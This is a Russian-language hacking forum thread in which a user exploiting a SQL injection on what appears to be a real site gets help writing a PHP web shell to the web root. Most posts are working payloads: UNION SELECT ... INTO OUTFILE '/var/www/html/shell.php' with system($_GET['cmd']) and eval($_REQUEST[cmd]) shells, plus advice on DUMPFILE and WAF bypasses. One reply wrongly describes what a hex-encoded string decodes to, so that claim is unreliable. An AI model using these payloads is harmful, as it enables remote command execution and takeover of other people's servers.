В sql injection не запускается php script

[farrukh]

В sql injection не запускается php script (-12 union all select 1,0x3c3f70687020706870696e666f28293a3f3e,3,4,5-- -) (-12 union all select 1,<?php phpinfo();?>,3,4,5-- -).
Пользователь root@localhost, есть доступ к чтению и запись.
на странице не отображается результат, если посмотреть исходный код странице php код отображается с красным светом, как решит задачу.

 

[noted]

Для того чтобы он выполнился необходимо его в php файл записать. В Вашем payloade я не вижу функции into outfile или чего-то подобного

 

[farrukh]

-12+union+all+select+1,0x3c3f70687020706870696e666f28293b203f3e,3,4,5+INTO+OUTFILE+'/var/www/html/shell.php'-- -

выдает 404,но есть права на запись файла?

в чем может быть проблема?

 

[noted]

Права записи в эту директорию у mysql есть?

 

[farrukh]

Права записи в эту директорию у mysql есть?

да есть

file_priv отвечать Y

 

[noted]

Ну слушай, выглядит запрос валидным. Можно попробовать dumpfile. Далее ток методом проб и ошибок, раз ерорки тебе не сыплются то сходу больше не могу сказать в чем дело еще (ведь в конце концов возможно просто ошибка в синтаксиса где то)

 

[farrukh]

Ну слушай, выглядит запрос валидным. Можно попробовать dumpfile. Далее ток методом проб и ошибок, раз ерорки тебе не сыплются то сходу больше не могу сказать в чем дело еще (ведь в конце концов возможно просто ошибка в синтаксиса где то)

Новерное нада еще проработать над ошибками, может проблема в синтаксисе, спасибо за ответ. Еще вопрос а можноли проверит на какие каталоги есть доступ mysql на запись? Как эго реализовать?

 

[rainS]

-12+union+all+select+1,0x3c3f70687020706870696e666f28293b203f3e,3,4,5+INTO+OUTFILE+'/var/www/html/shell.php'-- -

выдает 404,но есть права на запись файла?

в чем может быть проблема?

-12+union+all+select+1,'<?php system($_GET["cmd"]); ?>',3,4,5+INTO+OUTFILE+'/var/www/html/shell.php' #

 

[farrukh]

-12+union+all+select+1,'<?php system($_GET["cmd"]); ?>',3,4,5+INTO+OUTFILE+'/var/www/html/shell.php' #

Если сделать так ругается!
select * from i_requests r where r.id = 12 union select 1,'< limit 1

 

[rainS]

Если сделать так ругается!
select * from i_requests r where r.id = 12 union select 1,'< limit 1

-12+union+all+select+1,<?php system($_GET["cmd"]); ?>,3,4,5+INTO+OUTFILE+'/var/www/html/shell.php' #

 

[farrukh]

-12+union+all+select+1,<?php system($_GET["cmd"]); ?>,3,4,5+INTO+OUTFILE+'/var/www/html/shell.php' #

select * from i_requests r where r.id = 12 union all select 1,< limit 1

 

[rainS]

-12+all+select+1,'<?php eval($_REQUEST[cmd]); ?>',3,4,5+from+mysql.user+into+outfile+'/var/www/html/shell.php' #

 

[noted]

Если что, строка "0x3c3f70687020706870696e666f28293b203f3e" это "<?php system($_GET['c']);?> и mysql сам переводит эту строку.
Для начала, лучше бы попробовать записать какой ниб текст в файл и посмотреть - работает ли вообще. Возможно путь будет какой ниб /var/www/html/название сайта. Вы пробовали вызвать ваш php? Он вообще создаётся и находится там где нужно?
А потом уже пробовать всевозможные обходы waf

 

[farrukh]

Если что, строка "0x3c3f70687020706870696e666f28293b203f3e" это "<?php system($_GET['c']);?> и mysql сам переводит эту строку.
Для начала, лучше бы попробовать записать какой ниб текст в файл и посмотреть - работает ли вообще. Возможно путь будет какой ниб /var/www/html/название сайта. Вы пробовали вызвать ваш php? Он вообще создаётся и находится там где нужно?
А потом уже пробовать всевозможные обходы waf

чтение файлов возможно, но создание файла не как потому что он и txt даже не создает